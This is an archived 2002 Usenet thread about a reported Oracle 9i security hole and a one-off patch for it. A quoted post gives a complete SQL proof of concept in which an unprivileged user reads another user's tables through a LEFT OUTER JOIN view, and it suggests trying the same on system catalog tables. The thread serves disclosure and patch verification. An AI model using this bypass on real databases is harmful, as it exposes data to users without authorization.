Oracle FAQ | Your Portal to the Oracle Knowledge Grid |
Home -> Community -> Usenet -> c.d.o.server -> Re: 9iDB Security Hole?
Vladimir M. Zakharychev wrote:
>
> one-off patch for bug 2121935 (ARU:1600347) was put out for 9.0.1.3/Solaris
> yesterday. Anyone with 9.0.1.3/Sol can install it and verify that it closes the
> hole altogether?
>
> --
> Vladimir Zakharychev (bob@dpsp-yes.com) http://www.dpsp-yes.com
> Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet applications.
> All opinions are mine and do not necessarily go in line with those of my employer.
>
> "Vladimir M. Zakharychev" <bob_at_dpsp-yes.com> wrote in message news:a9et5g$9sa$1_at_babylon.agtel.net...
> > Anyone with 9i can confirm this?
> >
> > From: news [mailto:news_at_host.talk.ru] On Behalf Of ...
> > ...relcom.comp.dbms.oracle
> >
> >
> > connect system/****@database
> > CREATE USER us1 IDENTIFIED BY us11 DEFAULT TABLESPACE users TEMPORARY
> > TABLESPACE temp;
> > CREATE USER us2 IDENTIFIED BY us12 DEFAULT TABLESPACE users TEMPORARY
> > TABLESPACE temp;
> > Grant Create Session To us1;
> > Grant Create Session To us2;
> > Grant Create Table To us1;
> > grant unlimited tablespace to us1;
> > Grant Create View To us2;
> >
> > Connect us1/us11_at_database;
> > Create Table t1(c1 Number(1));
> > Insert Into t1(c1) Values(9);
> > Create Table t2(c1 Number(1));
> > Insert Into t2(c1) Values(9);
> >
> > commit;
> > Connect us2/us11_at_database;
> >
> > SQL> Select * From us1.t1;
> > ORA-00942: table or view does not exist
> > -- this is expected
> > SQL> Select * From us1.t2;
> > ORA-00942: table or view does not exist
> > -- this one too
> > SQL> Create View aa As Select * From us1.t1;
> > ORA-00942: table or view does not exist
> > -- and this one
> > SQL> Create View aa As Select t1.c1 As t1_c1, t2.c1 As t2_c1
> > >From us1.t1 Left Outer Join us1.t2 On t1.c1 = t2.c1;
> >
> > View created
> > -- now this one is NOT !!!!!
> > SQL> select * from aa;
> >
> > T1_C1 T2_C1
> > ---- ----
> > 9 9
> >
> >
> > This effectively means that LEFT OUTER JOIN allows to create views
> > on tables that are normally not visible (provided that unprivileged user
> > knows table and column names).
> > If you can confirm this basic example, can you also try it on system
> > catalog tables/views? If you can not confirm, please specify your version
> > and platform so that we know which ones are not affected (poster didn't
> > specify version, but I suggest it's 9.0.1.1 on either NT or Linux).
> >
> > --
> > Vladimir Zakharychev (bob@dpsp-yes.com) http://www.dpsp-yes.com
> > Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet applications.
> > All opinions are mine and do not necessarily go in line with those of my employer.
> >
> >
> >
Yes - plopped onto a machine today and it works fine
Cheers
Connor
-- ============================== Connor McDonald http://www.oracledba.co.uk "Some days you're the pigeon, some days you're the statue..."Received on Thu Apr 18 2002 - 15:58:22 CDT